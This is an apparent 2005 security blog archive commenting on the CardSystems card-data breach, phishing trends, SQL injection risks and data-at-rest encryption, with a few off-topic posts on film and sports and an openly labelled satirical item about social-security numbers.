    Investigators found that the criminal activities had begun in 2003 and were accidentally discovered when a custodian tripped over a power cord. One of the major bastion servers became unplugged, at which point an unknown person called the data-center. Speaking in a heavy Russian accent, the caller claimed to be the CIO of the organization and demanded that the bastion server "be plugged back into wall, damn you, we are doing much business important work with computer." The custodian became suspicious of the caller and alerted the organization's security staff.

    Reacting swiftly to a swath of fraudulent transactions sweeping the country, the Department of Homeland Security issued the following statement late yesterday:

    Effective September 1, 2005, your old social-security number will be shifted to a randomly selected social-security number (SSN). You will be notified of your new SSN on September 1 and all government systems will be updated on that day to reflect the changes.

    We foresee this becoming an annual anti-fraud effort, given the rampant insecurity of many companies that handle SSNs.


    Continued on page A12

    p.s., This is, quite obviously, satire. But it would be nice to have DHS coordinate a serious attempt to curtail the conventional approaches to identity theft.

    Update: Bruce Schneier weighs in with his take on the CardSystems disclosure. Read the whole thing.

     

    The New James Bond


    Picture credit: http://www.dancewithshadows.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThe clasically trained British actor Daniel Craig is reported to have won the coveted role of James Bond, replacing Pierce Brosnan. Do we really need another Bond who weighs a buck fifty and would likely take a butt-whooping from my brown-belt niece?

    Photo
    (adorocinema.cidadeinternet.com.br)

    I was thinking more along the lines of Christian Bale. He's got the sophisticated, yet hard-edged, look and even the accent, for goodness' sake.

    Plus, from his devastating tour in American Psycho, we know he can handle all of the requisite weaponry: from 9mm handguns to chain-saws and everything in between.

    Daniel Craig to be new James Bond
     

    Which Science Fiction Writer Are You?



    I am:
    Gregory Benford
    A master literary stylist who is also a working scientist.


    Which science fiction writer are you?



    I took the quiz and ended up with Gregory Benford. I'll have to look him up on Amazon. I was kinda hoping for Robert A. Heinlein. Ah well, dare to dream.
     

    Monday, June 20, 2005

    How SQL Injection Works



    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIt's true that we don't quite know the attack vector that was used to install trojan(s) on the CardSystems network. In my opinion, the three most likely possibilities are:

  • Social engineering: imagine one day you receive an official looking CD from your company's IT department. It's been snail-mailed to you directly, professionally emblazoned with the company logo and a pompous demand that you install the CD to ensure that your machine's security patches are current. This sort of thing may be what happened in the Israeli corporate espionage case.

  • Inside job: an insider, motivated by money, revenge or other factor, intentionally installed a trojan to expedite delivery of sensitive data to criminal parties.

  • SQL injection: a web application (say, a merchant access system) was compromised through SQL injection and a remote command execution hack (e.g., SQL Server's xp_cmdshell command or similar). Remote command execution offers the possibility of loading a malicious executable from an external FTP site... frightening, eh?

  • If you've ever wondered how SQL injection works... and how best to protect yourself against common web application attacks, this overview from UNIXwiz is one of the best I've seen.

    UNIXwiz: SQL Injection - by Example
     

    More CardSystems Tidbits Emerge


    Picture credit: http://www.massmenus.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueInteresting information on the CardSystems' security breach... carefully gleaned from multiple reports:

    Item 1: MasterCard announced the breach, which had been detected in May, probably to the consternation of CardSystems. What were the reasons for MasterCard's disclosure? Displeasure with CardSystems in general? A requirement to disclose the breach in a timely fashion, since CardSystems had had over a month? Or was it simply MasterCard demonstrating that it -- not CardSystems -- had discovered the intrusion?

    MasterCard traced the breach to CardSystems based on an unusual pattern of fraudulent transactions...

    "I don't have the detail on what type of fraud it was," Antle said. "It wasn't a large amount of fraud, just an abnormal pattern that triggered our system. ... We have tracking systems in place to find the common point of interaction."

    FBI spokeswoman Deb McCarley would not confirm the intrusion was the result of Internet hacking.


    Sketchy reports indicate that, indeed, a trojan was placed on at least one of CardSystems' computers.

    Item 2: CardSystems said that the FBI asked them not to disclose the breach... but the FBI denies that claim, according to this report. What the... ?

    Item 3: According to the New York Times, CardSystems wasn't even supposed to have this data  ! While CardSystems processes the transactions, it isn't supposed to retain any records, per its agreements with MasterCard and Visa. It appears that CardSystems somehow kept all of the data, perhaps for its own "research purposes":

    The chief of the credit card processing company... acknowledged yesterday that the company should not have been retaining those records... He said the data was in a file being stored for "research purposes" to determine why certain transactions had registered as unauthorized or uncompleted.

    ...Under rules established by Visa and MasterCard, processors are not allowed to retain cardholder information including names, account numbers, expiration dates and security codes after a transaction is handled.

    "CardSystems provides services and is supposed to pass that information on to the banks and not keep it," said Joshua Peirez, a MasterCard senior vice president who has been involved with the investigation. "They were keeping it."

    ...Jessica Antle, a MasterCard spokeswoman, said that CardSystems had never demonstrated compliance with MasterCard's standards. "They were in violation of our rules," she said.

    It is not clear whether or when MasterCard intervened with the company in the past to insure compliance, but MasterCard said Friday that it had now given CardSystems "a limited amount of time" to do so.

    ...MasterCard said that it had detected atypical levels of fraudulent charges on its cards as early as mid-April and, joined by Visa and an unspecified bank in mid-May, had requested that CardSystems allow its independent forensics team, Ubizen, to investigate. It was not until May 22 that the security specialists identified the rogue computer program as the source, MasterCard said.

    CardSystems said it contacted the F.B.I. offices in Tucson and Atlanta on May 23. The F.B.I. said Friday that its investigation was continuing.


    How did the intruders enter the system? Perhaps a processors' web application for merchants:

    "They typically have a Web site where merchants sign on with and then the merchants can look at the daily transactions, the balance in their account," Edward Lawrence, a managing associate at the Auriemma Consulting Group in Westbury, N.Y., which advises credit card merchants and processors. "My guess is that a hacker would get into the Web site and somehow find their way past a firewall and through the passwords and encroach onto the programming system."

    Mr. Peirez of MasterCard said that the data inappropriately retained by CardSystems was particularly sensitive because it included cardholders' three- and four-digit security codes, making it more attractive to potential thieves because it can double or triple the black-market value of a cardholder's account. Ms. Litan of Gartner said there was no reason for a processor to store security codes... In addition, the data lost in the CardSystems case was apparently not encrypted. "If it was encrypted, the hacker would have gotten data but would not have known how to read it," said Mr. Lawrence...

     

    Security? What Security?


    Picture credit: http://www.regiononline.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIT-Director's Robin Bloor has some choice commentary on the news that CardSystems may have exposed some forty million accounts to cyber-crooks:

    ...The secret is out "corporate America is inadequately protected against data theft." I think there's a crisis in the making – in fact, there is. The news is not good for you and I, but it is for the IT security vendors, who have clearly not been selling enough of their fine products to stop the rot.

    On Thursday of last week the US FTC (Federal Trade Commission) pronounced judgment on BJ Wholesale a company that had failed to protect customer data from identity theft. Its judgment was that BJ Wholesale should undergo a security audit every 2 years for the next 20 years. This doesn't sound like much of a penalty, but there can be little doubt that BJ Wholesale is going to have to spend heavily on IT security. It will cost them many green dollars, and woe betide BJ if it fails any of these audits...

    [CardSystems' stolen forty million accounts] ...sounds more like a spirited attempt to get into the Guinness Book of Records than a security breach ("What, ChoicePoint only exposed 140,000 identities? We'll show them").

    The press reports suggest that CardSystems was targeted by hackers, which seems highly likely. However, it is all a little confused as some reports claimed that the vulnerability was caused by a virus attack. Right now the full details may not be known. It was MasterCard that uncovered the problem. In investigating fraudulent transactions, it was able to deduce where the data was being stolen. Hats off to MasterCard. Visa and American Express, who also had millions of customers affected, should thank them.

    MasterCard is, however, deeply unimpressed with CardSystems. It says that CardSystems was storing card holder's account numbers and security codes on its computers in violation of MasterCard rules...


    Robin Bloor: Security? What Security?
     

    From the miscellaneous items department...


    Picture credit: NBA
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThe Spurs' Tim Duncan is one of the smartest and classiest players in the NBA. But a recent interview with his coach, Gregg Popovich, provided some unintended mental imagery:

    "He's exactly the same person that I laid on the sand with down in St. Croix when we drafted him," added Spurs coach Gregg Popovich. "He hasn't changed a lick, very honestly..."


    NBA.com: The Quiet Storm
     

    YubNub: A (social) command-line for the web


    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueHere's a really interesting idea, courtesy of John Battelle's Searchblog. YubNub is a "command-line for the web" with a social-networking spin.

    What to do an image search on Google for Anne Bancroft? Type in gim anne bancroft. How about viewing the Wikipedia entry for Bob Knight? Just type in wp bob knight.

    Want to create your own commands? That's where the social-networking aspect comes into play. You can add your own syntax to YubNub.

    Check it out: YubNub
     

    Saturday, June 18, 2005

    CardSystems' missing 40 million records



    Photo
    Two consumers enjoying their privacy (CardSystems)

    The details are sketchy, yet ominous. As many as forty million consumer credit-card records may have been stolen from CardSystems, a major payment-processing house.

    The theft was discovered back on May 22nd. And CardSystems seems none too pleased that MasterCard has disclosed the extent of the breach. Publicly, MasterCard indicated that:

    ...an intruder was able to use security vulnerabilities to infiltrate the CardSystems network and access the cardholder data...


    In addition, MasterCard reported that:

    ...CardSystems Solutions was hit by a computer virus that sucked up card numbers and other customer data...


    Who was behind it? Probably organized crime, at least based upon information in this Boston Globe article:

    ...MasterCard said yesterday that criminals used a computer virus to collect vast amounts of financial data moving through the company's computer network and estimated that 13.9 million of its accounts may have been stolen. Thieves also had access to millions of cards issued by Visa and Discover, as well as some American Express cards...

    ...examination of CardSystems computers found that information had been copied from a database containing 40 million account numbers from a variety of credit card brands. It also found that the CardSystems network had been infected sometime late last year, meaning that the data thieves had been able to collect credit card numbers for several months before the breach was detected.

    The investigators found that some of the stolen card numbers have been used illegally. ''We are aware of some fraud from the data that's been taken," said Jessica Antle, spokeswoman for MasterCard International. She added that the thieves had used very few of the stolen account numbers so far...


    Some expressed surprise that a breach of this scale was possible:

    ...Former federal prosecutor Mark Rasch, chief technical counsel for computer security firm Solutionary Inc., was surprised by the scale of the crime. ''It's not surprising that there's a breach," Rasch said. ''It is surprising that there's this large a breach." Rasch said that the data-stealing computer virus should have been quickly detected if CardSystems ran regular virus scans...


    Was it a virus... or something altogether different? The LA Times, via Slate, says:

    ...a "rogue program" planted in the computer network of CardSystems compromised millions of card numbers...


    The FBI is probably hunting down possibilities of an inside job or an Israeli-style social engineering scam (the recent Israeli corporate espionage debacle included trojans that were snail-mailed to victims as software updates from a corporate IT department).

    Ironically, CardSystems' website boasts of its e-Payment Systems offering:

    ...In today's information age, new technologies... increase the risk of fraud as perpetrators find new ways to infiltrate systems. You need payment solutions that help you grow revenue and maximize efficiencies while mitigating fraud...


    Yes, we do. That's their mission statement, eh? Repeat after me: forty... million... records.

    And now CardSystems' livelihood itself may be at stake. Mastercard has reportedly given CardSystems "an undisclosed deadline to demonstrate that its systems are now secure".

    That ought to be quite a demonstration.

    After reports like this one and the Israeli trojan horse scandal, one is left only to speculate how much cyber-criminal activity remains ongoing and completely undetected.
     

    Friday, June 17, 2005

    PayPal's Comical Anti-Phishing Page


    Picture credit: http://microsoft.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueI have a PayPal account, which I use only sporadically. And I just received an email purporting to be from PayPal itself, which addresses anti-phishing techniques. This should be fun. Let's review PayPal's advice for avoiding phishing scams (which they call spoofing). Entitled "Protect Yourself from Fraudulent Emails", it's actually somewhat comical.

    Here's the first "warning sign" of a bogus email, according to PayPal:

    Generic greetings.
    Many spoof emails begin with a general greeting, such as: "Dear PayPal member."


    In other words, the spammers can't address you by name.

    According to the security page, after you recognize a phishing attempt, you are advised to immediately contact their anti-fraud department:

    Forward the entire email - including the header information - or the site's URL to spoof@paypal.com We investigate every spoof reported. Please note that the automatic response you get from us may not address you by name.


    Talk about an enigma wrapped in a riddle... PayPal advises you to report any bogus email purporting to be from their organization. The first way to recognize a fraudulent email is a generic greeting. And when you send in a report of a phishing attempt, PayPal responds with another email that (using their criteria) also appears to be bogus. For the love of...

    And here's warning #3:

    Fake Links.
    The text in a link may attempt to... send you to a spoof address [sic]... be aware that a fake link may even have the word "PayPal" in it.


    Interesting. First problem: the PayPal anti-fraud page uses a domain name of paypalobjects.com, not paypal.com. What the...? Can't anyone here play this game?

    Yet another interesting aspect to the PayPal anti-fraud message is their attempt to get you to download a "helpful toolbar". Here's more from their security page:

    ...If you use Internet Explorer, download the eBay toolbar. Account Guard helps ensure you are on PayPal or eBay. Download the eBay toolbar now...


    This is almost too easy. My prediction is that phishers will create and pitch a fake eBay toolbar using their typical, massive spamming campaigns. For the phishers, this is an even better deal. Users will install a truly malevolent trojan themselves, all under the guise of increased security.

    You heard it here first.

    In my opinion -- and, for at least the three reasons listed above -- the PayPal anti-phishing page leaves a lot to be desired.

    The only realistic way to deal with the phishing scourge is to use digital signatures and intelligent email clients (preferably web-based) to ensure that the guy who says he sent the file really did so. Yahoo has released a proposed standard called DomainKeys that does exactly that.

    I think I'll wait for DomainKeys, thank you.

    PayPal: Protect Yourself from Fraudulent Emails
     

    Thursday, June 16, 2005

    Fraudsters use iPods to steal company information


    Picture credit: http://www.conversionfury.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThere are more options for ripping off sensitive data than there are noodles at Johnny Chan's Take-Out joint. All the more reason to ensure that your company's sensitive data is always encrypted at rest.

    Anti-fraud experts warned yesterday that the machines, along with other music players, that boast hard drives with up to 20Gbytes of memory, could become widely used by employees to fool security officials and breach data security rules.

    In one case a recruitment agency found much of its client database had been copied to an iPods's memory and used to defraud the firm.


    Guardian: Fraudsters use iPods to steal company information
     

    Wednesday, June 15, 2005

    The Next Generation of Phishing Tools


    (Picture credit http://www.carrera-uk.com)
    Excel-web sharing of spreadsheetsThe folks at SC Magazine -- or, maybe just Maksym Schipka -- describe the interesting ramifications of program complexity. Windows XP, according to Schipka, consists of a scant 40 million lines of code. A conservative figure of five bugs per KLOC (one thousand lines of code) yields the potential of perhaps 200,000 bugs. Schipka posits that about one-tenth of one percent of that figure will be remote-execution security issues: in other words, about 200 serious remote vulnerabilities.

    Worse, the trend towards blended, polymorphic attacks continues unabated. Recent generations of trojans blatantly scan for vulnerabilities, rip down defensive barriers such as anti-virus protection, and hijack trusted applications and libraries.

    From the phishing perspective, the trend is equally serious:

    ...A recent phishing attack, purporting to be a communication from a major UK bank to its customers, provides a significant pointer to likely future developments in the email banditry arena.

    It works like this: customers receive an email that makes the usual phishing bid to gain personal banking details -- but it also has a more purposeful payload. Before attempting the phish, it first uses an IFRAME exploit to download a trojan installer without the user's knowledge.

    The installer checks a number of parameters on the system -- for example, the versions of Windows and Internet Explorer being used, whether Norton AV updater or McAfee AV updater are running and what version of Java Virtual Machine is in use. Based on the information it collects, the installer chooses one of the four different exploits to perform the trojan executable drop.

    The innovation here is that, not only are different exploits and vulnerabilities used to penetrate the user's computer, but also that a trojan installer is an integral component of the phishing attempt.

    If this new technique proves as successful as its criminal perpetrators surely hope, we can expect to see even greater uses of such convergence in the future. With the prospect of spam messages arriving in your inbox trying to sell you a product while attempting also to obtain your personal banking information -- and planting a trojan on your computer at the same time -- the case for adopting comprehensive email security has surely never been more pressing...


    This conforms pretty much exactly with CounterPane's assessment. Blackhat activities revolve around criminal, not recreational, endeavors. Bruce Schneier:

    Another 2004 trend that we expect to continue in 2005 is crime. Hacking has moved from a hobbyist pursuit with a goal of notoriety to a criminal pursuit with a goal of money. Hackers can sell unknown vulnerabilities -- "zero-day exploits" -- on the black market to criminals who use them to break into computers. Hackers with networks of hacked machines can make money by selling them to spammers or phishers. They can use them to attack networks. We have started seeing criminal extortion over the Internet: hackers with networks of hacked machines threatening to launch DoS attacks against companies. Most of these attacks are against fringe industries -- online gambling, online computer gaming, online pornography -- and against offshore networks. The more these extortions are successful, the more emboldened the criminals will become.

    We expect to see more attacks against financial institutions, as criminals look for new ways to commit fraud. We also expect to see more insider attacks with a criminal profit motive. Already most of the targeted attacks -- as opposed to attacks of opportunity -- originate from inside the attacked organization's network...


    One thing is for certain: endpoint security has never been more critical.

    SC Magazine: The Potential for Bugs
     

    Top Open-Source Security Applications


    Picture credit: http://www.f-secure.de
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIf open-source security applications suit your taste (and, frankly, they should), NewsFactor reports on the top 'brands' of the OSS security world:

    OpenSSL: Anthony Nadalin, Chief Security Architect for IBM's software group, recommends Bouncy Castle crypto interfaces and OpenSSL -- an open-source implementation of the secure sockets layer (SSL) and transport layer security (TLS) protocols...

    OpenSSH: OpenSSH is another software package that comes highly recommended. This open-source implementation of the Secure SHell (SSH) session technology is designed to let administrators and users open a command shell on a remote host...

    Nessus: When it comes down to it, no matter what security system you use, you'll need to test for security vulnerabilities in your code. Both Jaquith and Moyle rate Nessus as a top-tier open-source vulnerability scanner...

    Nmap: Moyle and Jaquith recommend the Nmap port scanner, which is designed to interrogate remote hosts to see what services they are running. The open-source application usually can detect the operating system correctly as well... "For example, many companies use it to 'sweep' their networks to see what hosts are there, and to see if any of them are running services that would violate policy."

    IPtables: IPTables and IPFW are host-based firewalls for Linux and BSD, respectively. Both of them do the same thing: They block access to particular server ports using a flexible rule-based-language...

    ClamAV: Barracuda Networks' Levow sees considerable merit in the use of open-source antivirus and antispam tools, and specifically points to ClamAV as the largest and also most widely used open-source antivirus technology...


    NewsFactor: Top Open-Source Security Applications
     

    Frequency Jamming


    Picture credit: http://www.faa.gov
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueLike handheld lasers pointed at airliners to (presumably) blind pilots, this Washington Times report is somewhat ominous:

    ...Shortly before touching down in Charlotte, the pilot announced to passengers that the landing was being delayed because somebody was "jamming" the plane's communications with the control tower.
    "We have a jamming problem," the lawyer, who asks not to be identified, paraphrased the pilot. "We've gotten word from the tower that our radio frequencies are being jammed."
    Then these words: The problem could "involve national security."

    ..."Unless you find the source, you're not sure if it's inadvertent or on purpose. As you know from reporting on the lasers [being beamed at pilots from the ground], laser incidents go back 10 years. But it wasn't until the September 11th attacks that we have to look at everything through national security lines now."


    Washington Times: Jamming
     

    Now that's a concert


    Picture credit: http://www.espn.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueFrom the miscellaneous items department:

    Suspended Florida State quarterback Wyatt Sexton was doused by pepper spray and taken to a hospital by police after he was found lying in the street, saying he was God...

    ...Police said Sexton's roommates told them he had been at a Dave Matthews Band concert in Tennessee with them earlier Monday...

    ...However, The Dave Matthews Band played in Noblesville, Ind., on Sunday and Monday.


    Enquirer.com: College Football Notebook
     

    Tuesday, June 14, 2005

    Protecting Data At Rest


    Picture credit: http://www.unixwiz.net
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueOver at RedmondMag, Roberta Bragg notes some good starting points for protecting data at rest. Data 'at rest' means data stored statically on some media: hard disk, tape backup, etc. When sensitive data items -- like SSNs -- are stored in the clear, they're literally sitting ducks for hacking attempts.

    Overall her point is, as mine was a few days ago, that data 'at rest' needs a comprehensive set of data protection standards. Roberta provides a good checklist that IT teams can use to vet their standards against best practices.

    However, I believe she's omitted one quite crucial step in protecting data:

    Sensitive data should be encrypted at the application level. That is, even if you have an encrypted file system, don't trust that it alone will be sufficient to keep blackhats at bay. Go the extra mile and ensure that sensitive fields (SSNs, for instance) are encrypted at the application level. Force your application to securely retrieve decryption keys in order to convert the fields into cleartext data.

    Why? What's the risk?

    One with which I'm familiar is the old favorite, SQL injection. SQL injection permits an intruder to craft their own SQL statements and submit them against your databases. Thus, if SSNs are stored in the clear (at the field level), a SQL injection hack could rip the SSNs straight out of your tables. No muss and no fuss for the intruder.

    Thus, I recommend that all sensitive data is encrypted -- at the application level -- in the tables themselves. At least then, if a rogue process were to compromise your database, they have an extra attack to make against the sensitive fields. Force the bad guys to go the extra mile.

    Redmond: Data at Rest Is a Sitting Duck